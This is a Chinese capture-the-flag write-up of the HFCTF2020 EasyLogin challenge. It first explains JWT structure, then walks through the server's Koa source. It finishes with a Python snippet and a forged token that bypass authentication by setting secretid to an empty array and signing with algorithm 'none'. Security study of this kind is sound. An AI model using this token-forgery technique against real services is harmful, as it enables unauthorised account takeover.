目录
JWT一般由三部分组成,并使用base64编码
标头、payload、签名
标头由两部分组成:令牌的类型和所使用的签名算法
"alg":"HS256",
"typ":"JWT"
payload分为三种类型,注册的,公共的和私人权利
jwt是什么
JWT(JSON Web Token)是一个包含签名数据结构的字符串,通常用于对用户进行身份验证。JWT包含一个加密签名,例如数据上的HMAC。因此,只有服务器可以创建和修改令牌。这意味着服务器可以安全地
userid=123
在令牌中,并将令牌交给客户端,而不必担心客户端更改其用户标识符。这样,身份验证可以是无状态的:服务器不必记住令牌或用户的任何信息,因为所有信息都包含在令牌中。
JSON Web Tokens - jwt.io 官网,了解了以后我们可以刷题练习一下
[HFCTF2020]EasyLogin
打开界面以后,感觉是一道sql注入题目, 然后注册admin 发现已经被占用了,然后随机注册一个账号并登录
进入了以后,发现了一个查看flag的窗口,然后发现拒绝访问,这时候就想起了admin这个账号的作用,在登录框的时候抓一下包
发现这是一个jwt,最明显的特征就是分成了三段,每一段用.连接
发现用了HS256编码,这时候有一个思路就是换成none的编码格式我们就可以把账户改为admin然后得到了权限就可以得到flag了
仅仅是有这个想法,但是不知道如何去实现,只能扒一下大佬们的wp了
源码竟然有一个超链接,然后
/**
* 或许该用 koa-static 来处理静态文件
* 路径该怎么配置?不管了先填个根目录XD
*/
function login() {
const username = $("#username").val();
const password = $("#password").val();
const token = sessionStorage.getItem("token");
$.post("/api/login", {username, password, authorization:token})
.done(function(data) {
const {status} = data;
if(status) {
document.location = "/home";
}
})
.fail(function(xhr, textStatus, errorThrown) {
alert(xhr.responseJSON.message);
});
}
function register() {
const username = $("#username").val();
const password = $("#password").val();
$.post("/api/register", {username, password})
.done(function(data) {
const { token } = data;
sessionStorage.setItem('token', token);
document.location = "/login";
})
.fail(function(xhr, textStatus, errorThrown) {
alert(xhr.responseJSON.message);
});
}
function logout() {
$.get('/api/logout').done(function(data) {
const {status} = data;
if(status) {
document.location = '/login';
}
});
}
function getflag() {
$.get('/api/flag').done(function(data) {
const {flag} = data;
$("#username").val(flag);
}).fail(function(xhr, textStatus, errorThrown) {
alert(xhr.responseJSON.message);
});
}
译
第一部分
const username = $("#username").val();
const password = $("#password").val();
意思就是通过val(),获得这个标签的value的值,赋值给你声明的变量 const username
第二部分
const token=sessionStorage.getItem("token")
第三部分
$.post("/api/login", {username, password, authorization:token})
也就是使用post访问,前面为url,后面为参数。
第四部分
.done(function(data) {
const {status} = data;
if(status) {
document.location = "/home";
}
})
.fail(function(xhr, textStatus, errorThrown) {
alert(xhr.responseJSON.message);
然后是done和fail方法,成功了就重定位到/home目录,失败了就返回异常信息。
const {status} = data;
相当于 const status=this.state.status
查看WP发现,需要读取controllers/api.js
看了很多版本wp,都是据经验而言,先积累经验扒
查看/static/js/app.js,发现提示知道是koa框架
const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')
const APIError = require('../rest').APIError;
module.exports = {
'POST /api/register': async (ctx, next) => {
const {username, password} = ctx.request.body;
if(!username || username === 'admin'){
throw new APIError('register error', 'wrong username');
}
if(global.secrets.length > 100000) {
global.secrets = [];
}
const secret = crypto.randomBytes(18).toString('hex');
const secretid = global.secrets.length;
global.secrets.push(secret)
const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
ctx.rest({
token: token
});
await next();
},
'POST /api/login': async (ctx, next) => {
const {username, password} = ctx.request.body;
if(!username || !password) {
throw new APIError('login error', 'username or password is necessary');
}
const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;
const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
console.log(sid)
if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
throw new APIError('login error', 'no such secret id');
}
const secret = global.secrets[sid];
const user = jwt.verify(token, secret, {algorithm: 'HS256'});
const status = username === user.username && password === user.password;
if(status) {
ctx.session.username = username;
}
ctx.rest({
status
});
await next();
},
'GET /api/flag': async (ctx, next) => {
if(ctx.session.username !== 'admin'){
throw new APIError('permission error', 'permission denied');
}
const flag = fs.readFileSync('/flag').toString();
ctx.rest({
flag
});
await next();
},
'GET /api/logout': async (ctx, next) => {
ctx.session.username = null;
ctx.rest({
status: true
})
await next();
}
};
koa框架下有controllers目录,controllers目录下存有api.js,url直接访问(/controllers/api.js)可得
利用方式
利用nodejs的jwt缺陷,当jwt的secret为空,jwt会采用algorithm为none进行解密。
js是弱语言类型,我们可以将secretid设置为一个小数或空数组(空数组与数字比较时为0)来绕过secretid的一个验证(不能为null&undefined)
if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) { throw new APIError('login error', 'no such secret id'); }
这样secrret为空,加密算法也为none,成功绕过jwt验证
import jwt
token = jwt.encode(
{
"secretid": [],
"username": "admin",
"password": "123456",
"iat": 1665728024
},
algorithm="none", key="").decode(encoding='utf-8')
print(token)
iat换成自己的就可以,然后生成
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTY2NTcyODAyNH0.
登录的时候burp抓包,换一下
然后抓包这个flag 界面,重发包获得flag